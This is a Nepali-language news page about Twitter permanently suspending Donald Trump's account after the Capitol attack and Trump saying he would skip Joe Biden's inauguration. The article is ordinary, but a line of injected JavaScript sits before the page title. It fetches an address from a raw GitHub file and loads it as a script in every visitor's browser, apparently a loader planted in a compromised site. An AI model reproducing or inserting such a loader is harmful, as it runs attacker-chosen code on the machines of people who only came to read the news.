;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ट्रम्पको ट्वीटर खाता स्थायीरुपमा निलम्बन, जो बाइडेनको शपथ ट्रम्पले बहिष्कार गर्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ट्रम्पको ट्वीटर खाता स्थायीरुपमा निलम्बन, जो बाइडेनको शपथ ट्रम्पले बहिष्कार गर्ने
अन्तर्राष्ट्रिय

ट्रम्पको ट्वीटर खाता स्थायीरुपमा निलम्बन, जो बाइडेनको शपथ ट्रम्पले बहिष्कार गर्ने

पुस २५,

काठमाडौं । सामाजिक सञ्जाल ट्वीटरले अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पको खाता स्थायीरुपमा निलम्बन गरेको छ । ट्रम्पले हिंसालाई उकास्ने खतरा रहेको कारण ट्रम्पको ट्वीटर खाता स्थायीरुपमा निलम्बन गरेको ट्वीटरलाई उदृत गर्दै बीबीसीले जनाएको छ ।

चुनावी परिणाम अस्वीकार गर्ने क्रममा ट्रम्पका समर्थकहरूले बुधबार अमेरिकी संसदमै हमला गरी मानिसहरूको हत्या गरेका थिए । घटनापछि ट्रम्पको खातामा १२ घण्टे प्रतिबन्ध लगाएको ट्वीटरले ट्रम्पको खाता अस्थायी रुपमा निलम्बन गरेको हो ।

यसैबीच अमेरिकी राष्ट्रपतिमा निर्वाचित जो बाइडेनको पद तथा गोपनीयताको शपथ कार्यक्रममा राष्ट्रपति डोनाल्ड ट्रम्प अनुपस्थित हुने भएका छन् ।

ट्रम्पले ट्वीट गर्दै यस्तो जानकारी दिनुभएको हो । संसद हमलाको घटना लगत्तै सामाजिक सञ्जालहरूमा ट्रम्पमाथि प्रतिबन्ध लागेको थियो । १२ घण्टापछि ट्वीटरले प्रतिबन्ध हटाएलगत्तै ट्रम्पले शान्तिपूर्ण ढंगले सत्ता हस्तान्तरण हुने लेखेका छन् ।

त्यसपछि अर्को ट्वीटमा आफू जनवरी २० मा आयोजना हुने शपथमा आफू सहभागी नहुने जानकारी गराए ।

फेसबुक प्रतिक्रियाहरु